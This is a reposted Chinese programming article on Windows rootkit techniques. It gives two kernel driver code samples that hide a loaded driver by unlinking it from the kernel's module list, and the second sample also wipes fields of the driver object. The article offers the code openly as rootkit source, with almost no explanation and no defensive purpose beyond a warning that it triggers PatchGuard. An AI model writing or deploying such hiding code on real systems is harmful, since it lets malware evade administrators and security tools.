本文主要是介绍[Rootkit] 驱动隐藏 - 断链,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
注意 : 此方法会触发 PG
代码参考 1
typedef struct _driverdata
{LIST_ENTRY listentry;ULONG unknown1;ULONG unknown2;ULONG unknown3;ULONG unknown4;ULONG unknown5;ULONG unknown6;ULONG unknown7;UNICODE_STRING path;UNICODE_STRING name;
}driverdata;VOID xiezai1(PDRIVER_OBJECT qudongduixiang)
{KdPrint(("驱动卸载\n"));
}NTSTATUS DriverEntry(PDRIVER_OBJECT qudongduixiang, PUNICODE_STRING zhucebiao)
{KdPrint(("驱动入口开始\n"));driverdata*driverdata1 = NULL;driverdata1 = *(driverdata**)((ULONG)qudongduixiang + 20);if (driverdata1!=NULL){*(ULONG*)driverdata1->listentry.Blink = (ULONG)driverdata1->listentry.Flink;driverdata1->listentry.Flink->Blink = driverdata1->listentry.Blink;}qudongduixiang->DriverUnload = xiezai1;return STATUS_SUCCESS;
}
代码参考 2
#include "ntddk.h"
HANDLE hThread;
VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{DbgPrint("驱动卸载成功\n");
}VOID ThreadRun(PVOID StartContext)
{LARGE_INTEGER times;PDRIVER_OBJECT pDriverObject;times.QuadPart = -30 * 1000 * 1000; //等待3秒 单位是纳秒KeDelayExecutionThread(KernelMode, FALSE, ×);pDriverObject=(PDRIVER_OBJECT)StartContext;//修改模块信息pDriverObject->DriverSize = 0;pDriverObject->DriverSection = NULL;pDriverObject->DriverExtension = NULL;pDriverObject->DriverStart = NULL;pDriverObject->DriverInit = NULL;pDriverObject->FastIoDispatch = NULL;pDriverObject->DriverStartIo = NULL;ZwClose(hThread);
}NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pReg)
{PLIST_ENTRY pModuleList;pModuleList = pDriverObject->DriverSection;//前一个模块的Flink=本模块的FlinkpModuleList->Blink->Flink = pModuleList->Flink;//前一个模块的Blink=本模块的BlinkpModuleList->Flink->Blink = pModuleList->Blink;PsCreateSystemThread(&hThread,GENERIC_ALL,NULL,NULL,NULL, ThreadRun, pDriverObject);return 0;
}这篇关于[Rootkit] 驱动隐藏 - 断链的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
